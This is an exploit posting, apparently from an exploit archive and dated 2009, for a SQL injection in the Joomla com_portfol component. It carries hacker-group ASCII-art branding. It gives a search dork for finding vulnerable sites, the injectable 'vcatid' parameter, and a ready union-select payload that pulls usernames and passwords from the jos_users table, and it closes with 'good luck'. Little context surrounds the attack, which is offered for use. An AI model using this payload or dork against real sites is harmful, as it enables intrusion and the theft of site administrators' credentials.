[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_portfol SQL Injection Vulnerability
# Published : 2009-12-31
# Author : wlhaan hacker
# Previous Title : Classified Ads Scrip ( store_info.php id) Remote SQL Injection Vulnerability
# Next Title : pL-PHP <= beta 0.9 Local File Include Exploit
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> team wlhaan hacker |
| /___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
_____________________________________________________
#Joomla Component Portfol SQL Injection Vulnerability#
#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] Dork : inurl:"com_portfol""
# [+]
#####################################################
Exploit:
[~] Exploit: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=[SQL]
[~] Example: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users--
########################################
and good luck :D
Thanks to : shooq hacker ..
#####################################################